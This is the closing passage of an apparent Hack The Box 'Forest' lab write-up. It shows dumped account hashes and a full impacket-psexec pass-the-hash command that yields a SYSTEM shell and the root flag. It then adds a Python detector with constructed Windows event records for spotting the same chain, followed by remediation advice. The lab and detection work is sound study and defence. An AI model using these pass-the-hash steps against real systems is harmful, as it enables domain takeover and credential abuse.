FOREST$:des-cbc-md5:758ac8c20e5e43f7
EXCH01$:aes256-cts-hmac-sha1-96:1a87f882a1ab851ce15a5e1f48005de99995f2da482837d49f16806099dd85b6
EXCH01$:aes128-cts-hmac-sha1-96:9ceffb340a70b055304c3cd0583edf4e
EXCH01$:des-cbc-md5:8c45f44c16975129
[*] Cleaning up...

Now we have the NTLM hash of the Administrator account

Lateral Movement

Let's use the NTLM hash of the Administrator to perform a Pass-The-Hash attack

Using psexec for the PTH attack,

┌──(kaliaidenpearce369)-[~]
└─$ impacket-psexec htb.local/Administrator@10.10.10.161 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 10.10.10.161.....
[*] Found writable share ADMIN$
[*] Uploading file GxOgHmkQ.exe
[*] Opening SVCManager on 10.10.10.161.....
[*] Creating service MMTl on 10.10.10.161.....
[*] Starting service MMTl.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> hostname
FOREST

C:\Windows\system32> cd ../../
 
C:\> cd Users\Administrator\Desktop
 
C:\Users\Administrator\Desktop> more root.txt
<ROOT FLAG>

C:\Users\Administrator\Desktop> 

We can also use wmiexec and many other tools with the NTLM hash of the Administrator

With all the domain hashes dumped, this is a full domain takeover
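From the defender's side, every step of the chain in this writeup leaves a Windows event: the account creation and group additions done as svc-alfresco (4720 and the 4728/4732/4756 "member added" family), the nTSecurityDescriptor change on the domain object made by PowerView's Add-DomainObjectAcl (5136), the replication request issued by secretsdump (4662 carrying the DS-Replication-Get-Changes GUIDs) and the service psexec installs through ADMIN$ (7045). The detector below is an added example, not part of the original writeup or of any tool named here. It runs those checks over constructed event records modelled on the page's names (svc-alfresco, aidenpearce369, Exchange Windows Permissions, DC=htb,DC=local, service MMTl with GxOgHmkQ.exe) and correlates the hits per actor. Field names follow the Windows event schema; the record dictionaries, the sensitive-group list, the psexec path heuristic and the SubjectUserName on the 7045 record (which a real log carries as the event's Security UserID) are assumptions of this example.

```python
"""Detections for the escalation chain above, run over constructed Windows
event records. Added example, not part of the original writeup."""
import re
from collections import defaultdict
from dataclasses import dataclass

# Control access rights a DCSync needs; well-known AD schema GUIDs.
DCSYNC_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}
# Groups whose membership changes should always be reviewed (assumed list).
SENSITIVE_GROUPS = {
    "domain admins", "enterprise admins", "administrators", "schema admins",
    "account operators", "exchange windows permissions", "remote management users",
}
GROUP_ADD_EVENTS = {4728, 4732, 4756}  # member added to security-enabled global/local/universal group
# psexec-style service binary: eight random letters dropped into %SystemRoot% via ADMIN$ (heuristic).
PSEXEC_IMAGE_RE = re.compile(r"(?:%systemroot%|\\windows)\\[a-z]{8}\.exe$", re.IGNORECASE)


@dataclass
class Alert:
    rule: str
    actor: str
    detail: str


def analyze(events):
    """Run every rule over a list of event dicts; return alerts in event order."""
    alerts = []
    for ev in events:
        eid, actor = ev["EventID"], ev.get("SubjectUserName", "")
        if eid == 4720:
            alerts.append(Alert("account-created", actor, ev["TargetUserName"]))
        elif eid in GROUP_ADD_EVENTS and ev["TargetUserName"].lower() in SENSITIVE_GROUPS:
            alerts.append(Alert("sensitive-group-add", actor,
                                f'{ev["MemberName"]} -> {ev["TargetUserName"]}'))
        elif (eid == 5136
              and ev.get("AttributeLDAPDisplayName", "").lower() == "ntsecuritydescriptor"
              and ev["ObjectDN"].upper().startswith("DC=")):  # the domain naming context itself
            alerts.append(Alert("domain-acl-modified", actor, ev["ObjectDN"]))
        elif (eid == 4662 and not actor.endswith("$")  # DCs replicate legitimately
              and any(g in ev.get("Properties", "").lower() for g in DCSYNC_GUIDS)):
            alerts.append(Alert("dcsync", actor, ev.get("ObjectName", "")))
        elif eid == 7045 and PSEXEC_IMAGE_RE.search(ev.get("ImagePath", "")):
            alerts.append(Alert("psexec-service", actor, f'{ev["ServiceName"]} {ev["ImagePath"]}'))
    return alerts


def correlate(alerts):
    """Actors that triggered two or more distinct rules: a chain, not a one-off."""
    rules = defaultdict(set)
    for a in alerts:
        rules[a.actor].add(a.rule)
    return {actor for actor, r in rules.items() if len(r) >= 2}


# Constructed records modelled on the chain in this writeup (not real log exports).
SAMPLE_EVENTS = [
    {"EventID": 4720, "SubjectUserName": "svc-alfresco", "TargetUserName": "aidenpearce369"},
    {"EventID": 4756, "SubjectUserName": "svc-alfresco", "TargetUserName": "Exchange Windows Permissions",
     "MemberName": "CN=aidenpearce369,CN=Users,DC=htb,DC=local"},
    {"EventID": 4732, "SubjectUserName": "svc-alfresco", "TargetUserName": "Remote Management Users",
     "MemberName": "CN=aidenpearce369,CN=Users,DC=htb,DC=local"},
    {"EventID": 4728, "SubjectUserName": "helpdesk01", "TargetUserName": "Marketing",  # benign noise
     "MemberName": "CN=mark,CN=Users,DC=htb,DC=local"},
    {"EventID": 5136, "SubjectUserName": "aidenpearce369", "ObjectDN": "DC=htb,DC=local",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    {"EventID": 4662, "SubjectUserName": "aidenpearce369", "ObjectName": "%{domain-object-guid}",
     "AccessMask": "0x100", "Properties": "Control Access\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "DC02$", "ObjectName": "%{domain-object-guid}",  # DC replication
     "AccessMask": "0x100", "Properties": "Control Access\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 7045, "SubjectUserName": "Administrator", "ServiceName": "MMTl",
     "ImagePath": "%systemroot%\\GxOgHmkQ.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "SubjectUserName": "Administrator", "ServiceName": "Sysmon64",  # benign
     "ImagePath": "C:\\Windows\\Sysmon64.exe", "AccountName": "LocalSystem"},
]

if __name__ == "__main__":
    hits = analyze(SAMPLE_EVENTS)
    for h in hits:
        print(f"{h.rule:22} {h.actor:16} {h.detail}")
    print("chained actors:", correlate(hits))
```

Two caveats when moving this onto real logs: 4662 and 5136 only exist if the "Audit Directory Service Access" and "Audit Directory Service Changes" subcategories are enabled and the domain object carries a SACL for them, and the example drops every machine account from the DCSync rule for brevity, whereas production logic should compare the subject against the known domain controller computer accounts only. The structural fix this chain points at is removing the WriteDacl ACE that Exchange Windows Permissions holds on the domain object (Exchange's split-permissions model does this) and keeping service accounts out of Account Operators, so that neither the GenericAll nor the WriteDacl edge BloodHound drew exists in the first place.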